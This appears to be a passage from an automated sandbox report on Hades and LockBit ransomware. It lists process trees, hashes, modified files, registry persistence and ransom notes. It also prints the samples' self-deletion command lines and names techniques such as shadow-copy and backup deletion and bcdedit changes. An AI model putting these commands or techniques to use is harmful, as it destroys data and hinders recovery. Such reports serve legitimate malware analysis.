PID 2700 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan C:\Windows\system32\cmd.exe
PID 1360 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 1360 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 1360 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2852 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2852 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2992 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2992 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2852 wrote to memory of 612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2852 wrote to memory of 612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2852 wrote to memory of 612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan

C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan /go

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & del "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & rd "C:\Users\Admin\AppData\Roaming\Play8Pla\"

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan"

Network

N/A

Files

memory/1360-0-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/1360-1-0x0000000140000000-0x00000001401E2000-memory.dmp

\Users\Admin\AppData\Roaming\Play8Pla\Wwan

MD5 9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1 7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256 fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/2700-11-0x0000000001B70000-0x0000000001D32000-memory.dmp

memory/2700-12-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt

MD5 0c6d0a67b942d06fe27f41c7c582cdfe
SHA1 7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/1360-511-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2700-514-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2700-515-0x0000000001B70000-0x0000000001D32000-memory.dmp

memory/1360-517-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/1360-516-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win7-20240705-en

Max time kernel

1561s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (9368) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6CA8.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Civic.thmx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\weather.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\localizedSettings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
